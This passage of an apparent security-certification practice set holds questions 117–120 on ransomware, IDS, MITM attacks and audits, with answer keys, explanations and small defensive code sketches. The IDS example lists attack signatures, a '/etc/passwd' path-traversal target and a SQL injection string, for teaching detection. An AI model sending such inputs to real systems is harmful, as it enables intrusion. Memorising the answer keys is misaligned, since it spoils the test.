Overall, hybrid access control models offer a practical and robust solution for modern organizations, providing the adaptability of DAC alongside the rigorous, policy-driven protections of MAC, resulting in a more secure and manageable access control framework.
Question 117
Which type of malware encrypts a victim’s files and demands payment for decryption?
A) Worm
B) Trojan
C) Ransomware
D) Spyware
Answer: C) Ransomware
Explanation:
Ransomware is a type of malicious software designed to disrupt access to digital resources by encrypting files, locking systems, or otherwise rendering critical data inaccessible. Once infected, victims are typically presented with a ransom demand, often in cryptocurrency, in exchange for a decryption key or system restoration. Ransomware can propagate through multiple attack vectors, including phishing emails containing malicious attachments or links, compromised software downloads, or exploitation of unpatched vulnerabilities within networks and systems.
The impact of a ransomware attack can be severe, affecting operational continuity, causing significant financial loss, and damaging organizational reputation. For businesses that rely heavily on digital operations, downtime can lead to lost revenue, contractual penalties, and erosion of customer trust. In addition, sensitive data may be exposed or irreversibly lost if backups are unavailable or insufficient.
Effective mitigation requires a multi-layered approach. Regular and tested backups ensure data can be restored without succumbing to ransom demands. Endpoint protection, anti-malware tools, and timely patch management reduce vulnerabilities that ransomware exploits. User education is critical to minimize phishing risks, while network segmentation limits the spread of malware across critical systems. Organizations should maintain a detailed incident response plan that outlines containment procedures, forensic investigation, communication strategies, and recovery steps, emphasizing resilience without incentivizing ransom payment.
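One corrective control from the paragraph above can be sketched briefly: recording SHA-256 digests of backups so a restore can be verified as intact before it is trusted. The file names and contents are simulated bytes for illustration only.

```python
import hashlib

# Sketch of backup integrity verification with SHA-256: a restore is
# only trusted if its digest matches the recorded manifest. File
# contents are simulated as bytes for illustration.

def digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

backup_manifest = {"payroll.db": digest(b"payroll records v7")}

def verify_restore(name: str, restored: bytes) -> bool:
    """Compare a restored file's digest against the recorded manifest."""
    return backup_manifest.get(name) == digest(restored)

print(verify_restore("payroll.db", b"payroll records v7"))   # True: intact
print(verify_restore("payroll.db", b"ENCRYPTED-BY-RANSOM"))  # False: altered
```

In practice the manifest itself must be stored offline or immutably, since ransomware operators increasingly target backups and their metadata first.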
Overall, combating ransomware necessitates a combination of preventive, detective, and corrective controls. By proactively securing networks, educating users, and maintaining reliable recovery procedures, organizations can minimize the likelihood of infection, limit operational disruption, and ensure business continuity. Understanding the evolving tactics of ransomware operators is essential for maintaining robust cybersecurity defenses and safeguarding critical digital assets.
Question 118
Which of the following best describes the purpose of an Intrusion Detection System (IDS)?
A) To block unauthorized traffic
B) To detect and alert on suspicious network or system activity
C) To encrypt data in transit
D) To back up critical files
Answer: B) To detect and alert on suspicious network or system activity
Explanation:
An Intrusion Detection System (IDS) is a cybersecurity solution that monitors network or system activities to identify signs of malicious behavior, policy violations, or abnormal patterns, generating alerts for security teams to investigate. IDS can be classified into two main types: network-based (NIDS) and host-based (HIDS). NIDS monitors traffic across network segments to detect suspicious packets, unusual communication patterns, or known attack signatures, while HIDS focuses on activities on individual hosts, such as file integrity changes, unauthorized logins, or system configuration modifications.
Unlike firewalls or other preventive security tools, IDS does not actively block traffic. Instead, it provides enhanced visibility into potential threats, allowing organizations to respond before attacks escalate. IDS solutions utilize various detection techniques, including signature-based detection, which identifies known attack patterns; anomaly detection, which flags deviations from normal behavior; and behavioral analysis, which evaluates user or system actions for unusual activity. Combining these methods increases detection accuracy and reduces false positives.
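The two main techniques just named can be sketched in a few lines: a signature match against known-bad patterns and a crude anomaly check against a learned baseline. The signatures, baseline, and threshold below are invented for illustration, not drawn from any real IDS ruleset.

```python
# Minimal sketch of the two detection techniques: signature matching
# against known attack patterns and a crude rate-based anomaly check.
# Signatures, baseline, and threshold are invented for illustration.

SIGNATURES = ["/etc/passwd", "' OR '1'='1"]   # known-bad request patterns
BASELINE_REQ_PER_MIN = 100                    # learned "normal" rate

def inspect(request: str, req_per_min: int) -> list:
    alerts = []
    for sig in SIGNATURES:                    # signature-based detection
        if sig in request:
            alerts.append(f"signature: {sig}")
    if req_per_min > 5 * BASELINE_REQ_PER_MIN:  # anomaly detection
        alerts.append("anomaly: request rate over 5x baseline")
    return alerts

print(inspect("GET /../../etc/passwd HTTP/1.1", 80))
# ['signature: /etc/passwd']
print(inspect("GET /index.html HTTP/1.1", 900))
# ['anomaly: request rate over 5x baseline']
```

Note that, true to the IDS role, `inspect` only returns alerts; it never drops the request, which is what distinguishes detection from the prevention a firewall or IPS performs.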
IDS contributes significantly to an organization’s overall security posture. By delivering early warnings of attempted intrusions, IDS supports timely incident response, helping security teams contain threats and mitigate damage. Additionally, IDS logs and alerts provide valuable data for forensic investigations, compliance reporting, and vulnerability assessments.
For IDS to be effective, proper configuration, continuous monitoring, and integration with other security solutions—such as Security Information and Event Management (SIEM) systems, firewalls, and endpoint protection—are critical. Regular updates to detection rules and signatures, along with periodic tuning to adapt to evolving threats, ensure that the system remains relevant and responsive.
Question 119
Which term refers to the unauthorized interception and modification of communications between two parties?
A) Phishing
B) Man-in-the-middle attack
C) Replay attack
D) Denial-of-service attack
Answer: B) Man-in-the-middle attack
Explanation:
A man-in-the-middle (MITM) attack occurs when an attacker secretly intercepts, relays, or modifies communications between two parties, making both believe they are directly communicating with each other. MITM attacks can target a variety of communication channels, including web traffic, emails, messaging platforms, and other network-based communications. By positioning themselves between the sender and receiver, attackers can steal sensitive information such as login credentials, financial data, or personal details. They can also inject malicious content, manipulate transactions, or alter messages without the knowledge of either party, potentially causing financial or reputational damage.
MITM attacks exploit weaknesses in network security, unencrypted communications, or poor authentication mechanisms. Common attack techniques include packet sniffing, ARP spoofing, DNS spoofing, and HTTPS stripping. Public Wi-Fi networks are particularly vulnerable, as attackers can intercept traffic more easily in unsecured or poorly configured networks.
Mitigation strategies focus on ensuring the confidentiality, integrity, and authenticity of communications. Strong encryption protocols like TLS/SSL prevent attackers from reading intercepted data, while proper certificate validation ensures that parties are communicating with legitimate entities. Mutual authentication, where both parties verify each other’s identities, further reduces the risk of impersonation. Secure network configurations, such as VPNs and network segmentation, help protect data in transit. Additionally, user awareness and monitoring for unusual network behavior—such as unexpected redirects, certificate warnings, or abnormal traffic patterns—can help detect and prevent MITM attacks early.
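Certificate pinning, one of the validation controls mentioned above, can be sketched simply: the client records the SHA-256 fingerprint of the server's expected certificate and rejects any connection presenting a different one. The certificate bytes below are placeholders, not a real DER-encoded certificate.

```python
import hashlib

# Sketch of certificate pinning against MITM substitution: the client
# stores the SHA-256 fingerprint of the legitimate certificate and
# rejects any mismatch. The byte strings are placeholders, not real
# DER-encoded certificates.

PINNED = hashlib.sha256(b"server-cert-der-bytes").hexdigest()

def accept_certificate(presented_der: bytes) -> bool:
    """Reject any certificate whose fingerprint differs from the pin,
    as happens when a MITM substitutes its own certificate."""
    return hashlib.sha256(presented_der).hexdigest() == PINNED

print(accept_certificate(b"server-cert-der-bytes"))   # True: matches pin
print(accept_certificate(b"mitm-forged-cert-bytes"))  # False: rejected
```

Even an attacker who controls DNS or the network path cannot pass this check without the pinned certificate's private key, which is why pinning complements (rather than replaces) ordinary chain validation.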
Overall, MITM attacks highlight the importance of robust security practices, proper implementation of cryptographic protocols, and vigilance in monitoring communications. By combining technical safeguards with user awareness, organizations and individuals can significantly reduce the risk of interception and manipulation of sensitive data.
Question 120
Which of the following best describes a security audit?
A) A review and evaluation of security controls and practices
B) Installation of antivirus software
C) Configuration of firewalls
D) Routine patch deployment
Answer: A) A review and evaluation of security controls and practices
Explanation:
A security audit is a comprehensive and systematic evaluation of an organization’s information systems, policies, procedures, and controls to assess their effectiveness, identify potential vulnerabilities, ensure compliance, and evaluate overall risk exposure. These audits examine a wide range of security areas, including access management, network security, data protection, application security, incident response capabilities, and adherence to regulatory or industry standards such as ISO 27001, NIST, or GDPR.
Security audits can be performed internally by an organization’s own IT or security teams, or externally by independent auditors who provide an unbiased assessment of security posture. They are often conducted periodically, such as annually, or after major organizational changes, system upgrades, or security incidents to ensure ongoing compliance and effectiveness of controls.
The primary objectives of a security audit are to identify weaknesses or gaps in existing security measures, evaluate whether security policies are being followed, and recommend improvements to mitigate risks. Audits also provide evidence of accountability and due diligence for management, stakeholders, and regulators, demonstrating that the organization is actively managing its cybersecurity responsibilities.
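Part of the policy-compliance objective above can be automated; a minimal sketch is a baseline comparison that reports every observed setting deviating from policy. The baseline keys and values are invented for illustration.

```python
# Sketch of one automatable audit step: comparing observed system
# settings against a policy baseline and reporting gaps. Baseline
# and observed values are invented for illustration.

BASELINE = {"password_min_length": 12, "mfa_required": True, "tls_min": "1.2"}

def audit_gaps(observed: dict) -> list:
    """Return the names of settings that do not match the baseline."""
    return [key for key, expected in BASELINE.items()
            if observed.get(key) != expected]

observed = {"password_min_length": 8, "mfa_required": True, "tls_min": "1.2"}
print(audit_gaps(observed))  # ['password_min_length']
```

Real audits combine such automated checks with interviews, documentation review, and sampling, since many controls (for example, separation of duties) cannot be read out of a configuration file.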
Conducting regular security audits helps organizations maintain alignment with industry best practices, improve operational security, and protect critical information assets. Audit findings often inform strategic decisions regarding security investments, policy updates, and risk management strategies. By proactively identifying vulnerabilities and recommending corrective actions, security audits enhance an organization’s resilience against cyber threats, reduce the likelihood of data breaches, and increase stakeholder confidence in its cybersecurity posture.
Overall, security audits are an essential component of a robust cybersecurity program, providing both assurance and actionable insights to strengthen organizational defenses and maintain compliance with evolving security standards and regulatory requirements.